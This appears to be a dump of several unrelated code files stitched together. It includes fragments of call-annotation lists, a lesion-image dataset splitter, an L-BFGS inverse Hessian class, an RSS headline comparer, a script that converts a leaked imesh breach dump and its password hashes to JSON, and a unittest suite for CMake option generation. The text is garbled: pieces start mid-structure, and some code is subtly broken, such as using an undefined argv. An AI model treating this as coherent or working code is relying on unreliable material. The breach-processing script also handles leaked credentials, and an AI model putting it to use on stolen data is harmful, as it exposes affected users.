InvalidProjectArchiveException\n'), ((6066, 6108), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (6083, 6108), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((1100, 1114), 'ide.utils.cloudpebble_test.make_appinfo', 'make_appinfo', ([], {}), '()\n', (1112, 1114), False, 'from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings\n'), ((1702, 1744), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (1719, 1744), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((1964, 2015), 'ide.utils.cloudpebble_test.make_package', 'make_package', ([], {'package_options': "{'name': 'myproject'}"}), "(package_options={'name': 'myproject'})\n", (1976, 2015), False, 'from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings\n'), ((2612, 2664), 'ide.utils.cloudpebble_test.make_package', 'make_package', ([], {'package_options': "{'dependencies': deps}"}), "(package_options={'dependencies': deps})\n", (2624, 2664), False, 'from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings\n'), ((3222, 3274), 'ide.utils.cloudpebble_test.make_package', 'make_package', ([], {'package_options': "{'keywords': keywords}"}), "(package_options={'keywords': keywords})\n", (3234, 3274), False, 'from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings\n'), ((5227, 5269), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (5244, 5269), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((5502, 5558), 'ide.utils.cloudpebble_test.make_appinfo', 'make_appinfo', ([], {'options': "{'appKeys': [], 'sdkVersion': '2'}"}), "(options={'appKeys': [], 'sdkVersion': '2'})\n", (5514, 5558), False, 'from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings\n'), ((6336, 6350), 'ide.utils.cloudpebble_test.make_package', 'make_package', ([], {}), '()\n', (6348, 6350), False, 'from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings\n'), ((6824, 6877), 'ide.utils.cloudpebble_test.make_package', 'make_package', ([], {'pebble_options': "{'projectType': 'rocky'}"}), "(pebble_options={'projectType': 'rocky'})\n", (6836, 6877), False, 'from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings\n'), ((7634, 7689), 'ide.utils.cloudpebble_test.make_package', 'make_package', ([], {'pebble_options': "{'projectType': 'package'}"}), "(pebble_options={'projectType': 'package'})\n", (7646, 7689), False, 'from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings\n'), ((8385, 8594), 'ide.utils.cloudpebble_test.make_package', 'make_package', ([], {'pebble_options': "{'projectType': 'package', 'resources': {'media': [{'type': 'bitmap',\n 'name': 'MY_RES1', 'file': 'res1.png'}, {'type': 'bitmap', 'name':\n 'MY_RES2', 'file': 'res2.png'}]}}"}), "(pebble_options={'projectType': 'package', 'resources': {\n 'media': [{'type': 'bitmap', 'name': 'MY_RES1', 'file': 'res1.png'}, {\n 'type': 'bitmap', 'name': 'MY_RES2', 'file': 'res2.png'}]}})\n", (8397, 8594), False, 'from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings\n'), ((1597, 1617), 'ide.utils.cloudpebble_test.make_appinfo', 'make_appinfo', (['{k: v}'], {}), '({k: v})\n', (1609, 1617), False, 'from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings\n'), ((5031, 5104), 'ide.utils.cloudpebble_test.make_package', 'make_package', ([], {'package_options': "{'dependencies': {'some_package': version}}"}), "(package_options={'dependencies': {'some_package': version}})\n", (5043, 5104), False, 'from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings\n')] |
# -*- coding: utf-8 -*-
import click
import os
import logging
import sys
import pandas as pd
import os, sys, inspect
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"images_in_features_subdirs")))
if cmd_subfolder not in sys.path:
sys.path.append(cmd_subfolder)
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"non_duplicate_lesion_id")))
if cmd_subfolder not in sys.path:
sys.path.append(cmd_subfolder)
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"training_and_validation_sets")))
if cmd_subfolder not in sys.path:
sys.path.append(cmd_subfolder)
from images_in_features_subdirs import images_in_features_subdirs
from non_duplicate_lesion_id import non_duplicate_lesion_id
from training_and_validation_sets import training_and_validation_sets
def build_features(**kwargs):
metadata_csv = kwargs['metadata_csv']
train_dir = kwargs['train_dir']
images_dir = kwargs['images_dir']
val_dir = kwargs['val_dir']
"""
Takes data in ../data/interim. Splits training and validation data.
Stores splitted sets in ../data/processed/base_dir/train_dir
and ../data/processed/base_dir/val_dir
"""
#load meta-data-set
df = pd.read_csv(metadata_csv)
#Create non_duplicate column.
# Make a new df with unique_ids
df, df_unique_id = non_duplicate_lesion_id(df)
#split in training and validation dataframes
df, df_train, df_val = training_and_validation_sets(df,df_unique_id)
#place images in named attributes directories
images_in_features_subdirs(df,
images_dir = images_dir,
train_dir = train_dir,
val_dir = val_dir \
)
logger = logging.getLogger(__name__)
logger.info('Features added. Data is ready for modelling.')
if __name__ == '__main__':
import json
log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=log_fmt)
data=json.loads(argv[1])
build_features(data) | [
"logging.getLogger",
"logging.basicConfig",
"json.loads",
"images_in_features_subdirs.images_in_features_subdirs",
"pandas.read_csv",
"inspect.currentframe",
"training_and_validation_sets.training_and_validation_sets",
"sys.path.append",
"non_duplicate_lesion_id.non_duplicate_lesion_id"
] | [((312, 342), 'sys.path.append', 'sys.path.append', (['cmd_subfolder'], {}), '(cmd_subfolder)\n', (327, 342), False, 'import os, sys, inspect\n'), ((542, 572), 'sys.path.append', 'sys.path.append', (['cmd_subfolder'], {}), '(cmd_subfolder)\n', (557, 572), False, 'import os, sys, inspect\n'), ((777, 807), 'sys.path.append', 'sys.path.append', (['cmd_subfolder'], {}), '(cmd_subfolder)\n', (792, 807), False, 'import os, sys, inspect\n'), ((1477, 1502), 'pandas.read_csv', 'pd.read_csv', (['metadata_csv'], {}), '(metadata_csv)\n', (1488, 1502), True, 'import pandas as pd\n'), ((1607, 1634), 'non_duplicate_lesion_id.non_duplicate_lesion_id', 'non_duplicate_lesion_id', (['df'], {}), '(df)\n', (1630, 1634), False, 'from non_duplicate_lesion_id import non_duplicate_lesion_id\n'), ((1716, 1762), 'training_and_validation_sets.training_and_validation_sets', 'training_and_validation_sets', (['df', 'df_unique_id'], {}), '(df, df_unique_id)\n', (1744, 1762), False, 'from training_and_validation_sets import training_and_validation_sets\n'), ((1827, 1922), 'images_in_features_subdirs.images_in_features_subdirs', 'images_in_features_subdirs', (['df'], {'images_dir': 'images_dir', 'train_dir': 'train_dir', 'val_dir': 'val_dir'}), '(df, images_dir=images_dir, train_dir=train_dir,\n val_dir=val_dir)\n', (1853, 1922), False, 'from images_in_features_subdirs import images_in_features_subdirs\n'), ((2079, 2106), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (2096, 2106), False, 'import logging\n'), ((2304, 2359), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO', 'format': 'log_fmt'}), '(level=logging.INFO, format=log_fmt)\n', (2323, 2359), False, 'import logging\n'), ((2374, 2393), 'json.loads', 'json.loads', (['argv[1]'], {}), '(argv[1])\n', (2384, 2393), False, 'import json\n'), ((212, 234), 'inspect.currentframe', 'inspect.currentframe', ([], {}), '()\n', (232, 234), False, 'import os, sys, inspect\n'), ((445, 467), 'inspect.currentframe', 'inspect.currentframe', ([], {}), '()\n', (465, 467), False, 'import os, sys, inspect\n'), ((675, 697), 'inspect.currentframe', 'inspect.currentframe', ([], {}), '()\n', (695, 697), False, 'import os, sys, inspect\n')] |
from __future__ import print_function
import numpy as np
import os
class BFGS_Hessian(object):
"""
Class to evaluate the update to inverse Hessian matrix in the L-BFGS scheme.
(see wikipedia article if nothing else).
H is B^-1 form that article.
B_k+1 = B + yy^t / (y^ts) - B s s^t B / (s^t Bk s)) (all k on the RHS)
H_k+1 = (1 - sy^t / (y^t s) ) H (1 - ys^t / (y^ts))) + ss^t / (y^t s).
Determinant of B:
ln det Bk+1 = ln det Bk + ln( s^ty / s^t B s).
For quasi Newton, s_k = x_k1 - x_k = - alpha_k Hk grad_k with alpha_k newton step-length.
--> s^t B s at k is alpha_k^2 g_k H g_k
s^t y is - alpha_k (g_k+1 - g_k) H g_k
This leads to ln|B_k + 1| = ln |B_k| + ln(1 - 1/alpha_k g_k+1 H g_k / (gk H gk))
"""
def __init__(self, lib_dir, apply_H0k, paths2ys, paths2ss, L=100000, apply_B0k=None, verbose=True):
"""
:param apply_H0k: user supplied function(x,k), applying a zeroth order estimate of the inverse Hessian to x at
iter k.
:param paths2ys: dictionary of paths to the y vectors. y_k = grad_k+1 - grad_k
:param paths2ss: dictionary of paths to the s vectors. s_k = x_k+1 - xk_k
:return:
H is inverse Hessian, not Hessian.
"""
self.lib_dir = lib_dir
self.paths2ys = paths2ys
self.paths2ss = paths2ss
self.L = L
self.applyH0k = apply_H0k
self.applyB0k = apply_B0k
self.verbose = verbose
def y(self, n):
return np.load(self.paths2ys[n], mmap_mode='r')
def s(self, n):
return np.load(self.paths2ss[n], mmap_mode='r')
def add_ys(self, path2y, path2s, k):
assert os.path.exists(path2y), path2y
assert os.path.exists(path2s), path2s
self.paths2ys[k] = path2y
self.paths2ss[k] = path2s
if self.verbose:
print('Linked y vector ', path2y, ' to Hessian')
print('Linked s vector ', path2s, ' to Hessian')
def _save_alpha(self, alpha, i):
fname = os.path.join(self.lib_dir, 'temp_alpha_%s.npy' % i)
np.save(fname, alpha)
return
def _load_alpha(self, i):
"""
Loads, and remove, alpha from disk.
:param i:
:return:
"""
fname = os.path.join(self.lib_dir, 'temp_alpha_%s.npy' % i)
assert os.path.exists(fname)
ret = np.load(fname)
os.remove(fname)
return ret
def applyH(self, x, k, _depth=0):
"""
Recursive calculation of H_k x, for any x.
This uses the product form update H_new = (1 - rho s y^t) H (1 - rho y s^t) + rho ss^t
:param x: vector to apply the inverse Hessian to
:param k: iter level. Output is H_k x.
:param _depth : internal, for internal bookkeeping.
:return:
"""
if k <= 0 or _depth >= self.L or self.L == 0: return self.applyH0k(x, k)
s = self.s(k - 1)
y = self.y(k - 1)
rho = 1. / np.sum(s * y)
Hv = self.applyH(x - rho * y * np.sum(x * s), k - 1, _depth=_depth + 1)
return Hv - s * (rho * np.sum(y * Hv)) + rho * s * np.sum(s * x)
def get_gk(self, k, alpha_k0):
"""
Reconstruct gradient at xk, given the first newton step length at step max(0,k-L)
! this is very badly behaved numerically.
"""
assert self.applyB0k is not None
ret = -self.applyB0k(self.s(max(0, k - self.L)),max(0,k-self.L)) / alpha_k0
for j in range(max(0, k - self.L), k):
ret += self.y(j)
return ret
def get_sBs(self, k, alpha_k, alpha_k0):
"""
Reconstruct s^Bs at x_k, given the first newton step length at step max(0,k-L) and current step alpha_k.
"""
return - alpha_k * np.sum(self.s(k) * self.get_gk(k, alpha_k0))
def get_lndet_update(self, k, alpha_k, alpha_k0):
"""
Return update to B log determinant, lndet B_k+1 = lndet B_k + output.
"""
return np.log(np.sum(self.y(k) * self.s(k)) / self.get_sBs(k, alpha_k, alpha_k0))
def get_mHkgk(self, gk, k, output_fname=None):
"""
Obtains - H_k g_k with L-BFGS two-loop recursion.
:param gk: grad f(x_k)
:param k: iterate index
:return: - H_k g_k according to L-BFGS.
If output_fname is set then output is saved in file and nothing is returned.
Should be fine with k == 0
"""
q = gk.copy()
rho = lambda i: 1. / np.sum(self.s(i) * self.y(i))
for i in range(k - 1, np.max([-1, k - self.L - 1]), -1):
alpha_i = rho(i) * np.sum(self.s(i) * q)
q -= alpha_i * self.y(i)
self._save_alpha(alpha_i, i)
r = self.applyH0k(q, k)
for i in range(np.max([0, k - self.L]), k):
beta = rho(i) * np.sum(self.y(i) * r)
r += self.s(i) * (self._load_alpha(i) - beta)
if output_fname is None: return -r
np.save(output_fname, -r)
return
def sample_Gaussian(self, k, x_0, rng_state=None):
"""
sample from a MV zero-mean Gaussian with covariance matrix H, at iteration level k,
given input x_0 random vector with covariance H_0.
Since H is the inverse Hessian, then H is roughly the covariance matrix of the parameters in a line search.
:param k:
:param x_0:
:return:
"""
ret = x_0.copy()
rho = lambda i: 1. / np.sum(self.s(i) * self.y(i))
if rng_state is not None: np.random.set_state(rng_state)
eps = np.random.standard_normal((len(range(np.max([0, k - self.L]), k)), 1))
for idx, i in enumerate(range(np.max([0, k - self.L]), k)):
ret = ret - self.s(i) * np.sum(self.y(i) * ret) * rho(i) + np.sqrt(rho(i)) * self.s(i) * eps[idx]
return ret
| [
"os.path.exists",
"numpy.random.set_state",
"os.path.join",
"numpy.max",
"numpy.sum",
"numpy.load",
"numpy.save",
"os.remove"
] | [((1529, 1569), 'numpy.load', 'np.load', (['self.paths2ys[n]'], {'mmap_mode': '"""r"""'}), "(self.paths2ys[n], mmap_mode='r')\n", (1536, 1569), True, 'import numpy as np\n'), ((1606, 1646), 'numpy.load', 'np.load', (['self.paths2ss[n]'], {'mmap_mode': '"""r"""'}), "(self.paths2ss[n], mmap_mode='r')\n", (1613, 1646), True, 'import numpy as np\n'), ((1704, 1726), 'os.path.exists', 'os.path.exists', (['path2y'], {}), '(path2y)\n', (1718, 1726), False, 'import os\n'), ((1750, 1772), 'os.path.exists', 'os.path.exists', (['path2s'], {}), '(path2s)\n', (1764, 1772), False, 'import os\n'), ((2050, 2101), 'os.path.join', 'os.path.join', (['self.lib_dir', "('temp_alpha_%s.npy' % i)"], {}), "(self.lib_dir, 'temp_alpha_%s.npy' % i)\n", (2062, 2101), False, 'import os\n'), ((2110, 2131), 'numpy.save', 'np.save', (['fname', 'alpha'], {}), '(fname, alpha)\n', (2117, 2131), True, 'import numpy as np\n'), ((2297, 2348), 'os.path.join', 'os.path.join', (['self.lib_dir', "('temp_alpha_%s.npy' % i)"], {}), "(self.lib_dir, 'temp_alpha_%s.npy' % i)\n", (2309, 2348), False, 'import os\n'), ((2364, 2385), 'os.path.exists', 'os.path.exists', (['fname'], {}), '(fname)\n', (2378, 2385), False, 'import os\n'), ((2400, 2414), 'numpy.load', 'np.load', (['fname'], {}), '(fname)\n', (2407, 2414), True, 'import numpy as np\n'), ((2423, 2439), 'os.remove', 'os.remove', (['fname'], {}), '(fname)\n', (2432, 2439), False, 'import os\n'), ((4976, 5001), 'numpy.save', 'np.save', (['output_fname', '(-r)'], {}), '(output_fname, -r)\n', (4983, 5001), True, 'import numpy as np\n'), ((3001, 3014), 'numpy.sum', 'np.sum', (['(s * y)'], {}), '(s * y)\n', (3007, 3014), True, 'import numpy as np\n'), ((4566, 4594), 'numpy.max', 'np.max', (['[-1, k - self.L - 1]'], {}), '([-1, k - self.L - 1])\n', (4572, 4594), True, 'import numpy as np\n'), ((4788, 4811), 'numpy.max', 'np.max', (['[0, k - self.L]'], {}), '([0, k - self.L])\n', (4794, 4811), True, 'import numpy as np\n'), ((5537, 5567), 'numpy.random.set_state', 'np.random.set_state', (['rng_state'], {}), '(rng_state)\n', (5556, 5567), True, 'import numpy as np\n'), ((3154, 3167), 'numpy.sum', 'np.sum', (['(s * x)'], {}), '(s * x)\n', (3160, 3167), True, 'import numpy as np\n'), ((5692, 5715), 'numpy.max', 'np.max', (['[0, k - self.L]'], {}), '([0, k - self.L])\n', (5698, 5715), True, 'import numpy as np\n'), ((3054, 3067), 'numpy.sum', 'np.sum', (['(x * s)'], {}), '(x * s)\n', (3060, 3067), True, 'import numpy as np\n'), ((3126, 3140), 'numpy.sum', 'np.sum', (['(y * Hv)'], {}), '(y * Hv)\n', (3132, 3140), True, 'import numpy as np\n'), ((5619, 5642), 'numpy.max', 'np.max', (['[0, k - self.L]'], {}), '([0, k - self.L])\n', (5625, 5642), True, 'import numpy as np\n')] |
import feedparser
import difflib
import json
cbc = feedparser.parse("http://rss.cbc.ca/lineup/topstories.xml")
print(json.dumps(cbc))
print("\n\n################################################\n\n")
cnn = feedparser.parse("http://rss.cnn.com/rss/cnn_topstories.rss")
print(json.dumps(cnn))
print("\n\n################################################\n\n")
cbc_titles = [x['title'] for x in cbc.get('entries')]
cnn_titles = [x['title'] for x in cnn.get('entries')]
res = [(x,difflib.get_close_matches(x,cbc_titles,1,0.01)) for x in
cnn_titles]
print(json.dumps(res))
| [
"feedparser.parse",
"json.dumps",
"difflib.get_close_matches"
] | [((51, 110), 'feedparser.parse', 'feedparser.parse', (['"""http://rss.cbc.ca/lineup/topstories.xml"""'], {}), "('http://rss.cbc.ca/lineup/topstories.xml')\n", (67, 110), False, 'import feedparser\n'), ((206, 267), 'feedparser.parse', 'feedparser.parse', (['"""http://rss.cnn.com/rss/cnn_topstories.rss"""'], {}), "('http://rss.cnn.com/rss/cnn_topstories.rss')\n", (222, 267), False, 'import feedparser\n'), ((117, 132), 'json.dumps', 'json.dumps', (['cbc'], {}), '(cbc)\n', (127, 132), False, 'import json\n'), ((274, 289), 'json.dumps', 'json.dumps', (['cnn'], {}), '(cnn)\n', (284, 289), False, 'import json\n'), ((562, 577), 'json.dumps', 'json.dumps', (['res'], {}), '(res)\n', (572, 577), False, 'import json\n'), ((475, 524), 'difflib.get_close_matches', 'difflib.get_close_matches', (['x', 'cbc_titles', '(1)', '(0.01)'], {}), '(x, cbc_titles, 1, 0.01)\n', (500, 524), False, 'import difflib\n')] |
"""
Usage Example:
cat imesh_sample.txt | python dump_to_json.py -o imesh.json -e imesh_hashes.json
"""
import sys
import json
import argparse
import traceback
from os.path import dirname, abspath
project_folder = dirname(dirname(abspath('.')))
if project_folder not in sys.path:
sys.path.append(project_folder)
from breaches.lib.data_record import ValidationError
def eprint(*args, **kwargs): # pylint: disable=w0621
print(*args, file=sys.stderr, **kwargs)
if '__main__' == __name__:
parser = argparse.ArgumentParser()
parser.add_argument("-o", "--output_filename", help="File to write json data info for breaches index")
parser.add_argument("-e", "--hash_filename",
help="File to write json data info for hashes index")
args = parser.parse_args()
if args.output_filename is None:
parser.print_help()
sys.exit(1)
package_base = dirname(dirname(dirname(abspath(__file__))))
if package_base not in sys.path:
sys.path.insert(0, package_base)
from breaches.imesh.imesh import ImeshImporter
importer = ImeshImporter()
dump_type = 'hashed'
output_file = open(args.output_filename, "w", encoding='utf8')
hash_file = None
if args.hash_filename:
hash_file = open(args.hash_filename, "w")
processed_count = 0
error_count = 0
line_num = 1
for line in sys.stdin:
try:
hash_record = {}
line_num += 1
record = importer.process_record(line.rstrip(), dump_type, for_import=True)
if record is None:
eprint("Skipping: " + line.rstrip())
continue
if hash_file and hasattr(record, 'hash') and record.hash is not None:
hash_record["hash"] = record.hash
if hasattr(record, 'password') and record.password is not None:
hash_record["password"] = record.password
if hasattr(record, 'salt') and record.salt is not None:
hash_record["salt"] = record.salt
hash_record["hashtype"] = record.hashtype
hash_file.write(json.dumps(hash_record) + '\n')
# Delete any fields that are in the dump's ignore list
if importer._import_ignore_fields:
for fname in importer._import_ignore_fields:
if hasattr(record, fname):
delattr(record, fname)
processed_count += 1
output_file.write(record.to_json() + '\n')
if 0 == processed_count % 100000:
eprint("Processed %i, Errors: %i" % (processed_count, error_count))
except ValidationError as vexp:
error_count += 1
eprint("ValidationError %r\n while processing line number %i\n %s" %
(vexp, line_num, line))
except Exception as exp:
error_count += 1
eprint("Error %r\n while processing line number %i\n %s" %
(exp, line_num, line))
traceback.print_exc(file=sys.stderr)
print("Processed %i, Errors: %i" % (processed_count, error_count))
output_file.close()
if hash_file:
hash_file.close()
| [
"sys.path.insert",
"breaches.imesh.imesh.ImeshImporter",
"argparse.ArgumentParser",
"json.dumps",
"sys.exit",
"os.path.abspath",
"traceback.print_exc",
"sys.path.append"
] | [((287, 318), 'sys.path.append', 'sys.path.append', (['project_folder'], {}), '(project_folder)\n', (302, 318), False, 'import sys\n'), ((516, 541), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (539, 541), False, 'import argparse\n'), ((1106, 1121), 'breaches.imesh.imesh.ImeshImporter', 'ImeshImporter', ([], {}), '()\n', (1119, 1121), False, 'from breaches.imesh.imesh import ImeshImporter\n'), ((233, 245), 'os.path.abspath', 'abspath', (['"""."""'], {}), "('.')\n", (240, 245), False, 'from os.path import dirname, abspath\n'), ((883, 894), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (891, 894), False, 'import sys\n'), ((1005, 1037), 'sys.path.insert', 'sys.path.insert', (['(0)', 'package_base'], {}), '(0, package_base)\n', (1020, 1037), False, 'import sys\n'), ((939, 956), 'os.path.abspath', 'abspath', (['__file__'], {}), '(__file__)\n', (946, 956), False, 'from os.path import dirname, abspath\n'), ((3092, 3128), 'traceback.print_exc', 'traceback.print_exc', ([], {'file': 'sys.stderr'}), '(file=sys.stderr)\n', (3111, 3128), False, 'import traceback\n'), ((2188, 2211), 'json.dumps', 'json.dumps', (['hash_record'], {}), '(hash_record)\n', (2198, 2211), False, 'import json\n')] |
#!/usr/bin/env python3
# -*- mode: python; py-indent-offset: 4; py-continuation-offset: 4 -*-
#===============================================================================
#
# License (3-Clause BSD)
# ----------------------
# Copyright 2021 National Technology & Engineering Solutions of Sandia,
# LLC (NTESS). Under the terms of Contract DE-NA0003525 with NTESS,
# the U.S. Government retains certain rights in this software.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#===============================================================================
"""
"""
from __future__ import print_function
import sys
sys.dont_write_bytecode = True
import contextlib
import io
import os
sys.path.insert(1, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from pprint import pprint
import unittest
from unittest import TestCase
# Coverage will always miss one of these depending on the system
# and what is available.
try: # pragma: no cover
import unittest.mock as mock # pragma: no cover
except: # pragma: no cover
import mock # pragma: no cover
from mock import Mock
from mock import MagicMock
from mock import patch
import filecmp
from textwrap import dedent
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
from setprogramoptions import *
from .common import *
# ===============================================================================
#
# General Utility Data
#
# ===============================================================================
global_gen_new_ground_truth_files = False
# global_gen_new_ground_truth_files = True # comment this out for production.
class DEFAULT_VALUE(object):
pass
# ===============================================================================
#
# General Utility Functions
#
# ===============================================================================
# ===============================================================================
#
# Mock Helpers
#
# ===============================================================================
# ===============================================================================
#
# Tests
#
# ===============================================================================
class SetProgramOptionsTestCMake(TestCase):
"""
Main test driver for the SetProgramOptions class
"""
def setUp(self):
print("")
self.maxDiff = None
self._filename = find_config_ini(filename="config_test_setprogramoptions.ini")
# Get the location of the unit testing scripts (for file writing tests)
unit_test_path = os.path.realpath(__file__)
self.unit_test_file = os.path.basename(unit_test_path)
self.unit_test_path = os.path.dirname(unit_test_path)
def test_SetProgramOptionsCMake_Template(self):
"""
Basic template test for SetProgramOptions.
This test doesn't really validate any output -- it just runs a basic check.
"""
parser = self._create_standard_parser()
print("-----[ TEST BEGIN ]----------------------------------------")
section = "CMAKE_GENERATOR_NINJA"
print("Section : {}".format(section))
# parse a section
self._execute_parser(parser, section)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_property_inifilepath(self):
"""
Runs a check that loads the filename using `inifilepath` property
rather than the parameter in the c'tor.
"""
parser = self._create_standard_parser(filename=None)
parser.inifilepath = self._filename
print("-----[ TEST BEGIN ]----------------------------------------")
# parse all sections
print("-" * 40)
print("Execute Parser")
print("-" * 40)
sections = parser.configparserenhanceddata.sections(parse=False)
self.assertGreater(len(sections), 2)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_gen_option_list_bash(self):
"""
Test the ``gen_option_list`` method using the ``bash`` generator.
"""
parser = self._create_standard_parser()
print("-----[ TEST BEGIN ]----------------------------------------")
section = "TRILINOS_CONFIGURATION_ALPHA"
print("Section : {}".format(section))
# parse a section
self._execute_parser(parser, section)
print("-" * 40)
print("Option List")
print("-" * 40)
option_list_expect = [
'cmake',
'-G=Ninja',
'-DTrilinos_ENABLE_COMPLEX:BOOL=ON',
'-DTrilinos_ENABLE_THREAD_SAFE:BOOL=ON',
# '-DTrilinos_PARALLEL_COMPILE_JOBS_LIMIT=20',
# '-DTrilinos_PARALLEL_LINK_JOBS_LIMIT=4',
'-DTrilinos_ENABLE_Kokkos:BOOL=ON',
'-DTrilinos_ENABLE_KokkosCore:BOOL=ON',
'-DTrilinos_ENABLE_KokkosKernels:BOOL=ON',
'-DKokkosKernels_ENABLE_EXAMPLES:BOOL=ON',
'-DTrilinos_ENABLE_Tpetra:BOOL=ON',
'-DTpetra_INST_DOUBLE:BOOL=ON',
'/path/to/source/dir'
]
option_list_actual = parser.gen_option_list(section, generator="bash")
pprint(option_list_actual, width=200)
self.assertListEqual(option_list_expect, option_list_actual)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_gen_option_list_bash_expandvars(self):
"""
Test the ``gen_option_list`` method using the ``bash`` generator.
"""
parser = self._create_standard_parser()
# parser.exception_control_compact_warnings = True
print("-----[ TEST BEGIN ]----------------------------------------")
section = "TEST_VAR_EXPANSION_UPDATE_01"
print("Section : {}".format(section))
self._execute_parser(parser, section)
print("-" * 40)
print("Option List")
print("-" * 40)
option_list_expect = [
'cmake',
'-DCMAKE_CXX_FLAGS:STRING="${LDFLAGS} -foo"',
]
option_list_actual = parser.gen_option_list(section, generator="bash")
pprint(option_list_actual, width=200)
self.assertListEqual(option_list_expect, option_list_actual)
print("OK")
print("-----[ TEST END ]------------------------------------------")
print("-----[ TEST BEGIN ]----------------------------------------")
# Update 03 will generate the update option
section = "TEST_VAR_EXPANSION_UPDATE_03"
print("Section : {}".format(section))
self._execute_parser(parser, section)
print("-" * 40)
print("Option List")
print("-" * 40)
option_list_expect = [
'cmake',
'-DCMAKE_CXX_FLAGS:STRING="${LDFLAGS} -foo"',
'-DCMAKE_CXX_FLAGS:STRING="${LDFLAGS} -foo -bif"',
]
option_list_actual = parser.gen_option_list(section, generator="bash")
pprint(option_list_actual, width=200)
self.assertListEqual(option_list_expect, option_list_actual)
print("OK")
print("-----[ TEST END ]------------------------------------------")
return 0
def test_SetProgramOptionsCMake_gen_option_list_bash_expandvars_with_unknown_cmake_var_ecl3(self):
"""
Test the ``gen_option_list`` method using the ``bash`` generator when the ECL for
ExpandVarsInTextCMake is set to 3 or lower. This should generate a WARNING.
"""
parser = self._create_standard_parser()
parser.exception_control_compact_warnings = False
parser.exception_control_level = 3
print("-----[ TEST BEGIN ]----------------------------------------")
section = "TEST_VAR_EXPANSION_UPDATE_02"
print("Section : {}".format(section))
# parse the section
self._execute_parser(parser, section)
# Generate a BASH script representing the instructions in the section.
# what answer do we EXPECT:
option_list_expect = [
'cmake', '-DCMAKE_CXX_FLAGS:STRING="${LDFLAGS} -foo"', '-DCMAKE_F90_FLAGS:STRING=" -baz"'
]
# Generate the BASH entries:
option_list_actual = parser.gen_option_list(section, generator="bash")
# Verify the results:
self.assertListEqual(option_list_actual, option_list_expect)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_gen_option_list_bash_expandvars_with_unknown_cmake_var_ecl4(self):
"""
Test the ``gen_option_list`` method using the ``bash`` generator when the ECL
for ExpandVarsInTextCMake is set to 4 or higher. This should raise a ``ValueError``.
"""
parser = self._create_standard_parser()
parser.exception_control_level = 5
print("-----[ TEST BEGIN ]----------------------------------------")
section = "TEST_VAR_EXPANSION_UPDATE_02"
print("Section : {}".format(section))
# parse the section
self._execute_parser(parser, section)
# Generate a BASH script representing the instructions in the section.
with self.assertRaises(ValueError):
parser.gen_option_list(section, generator="bash")
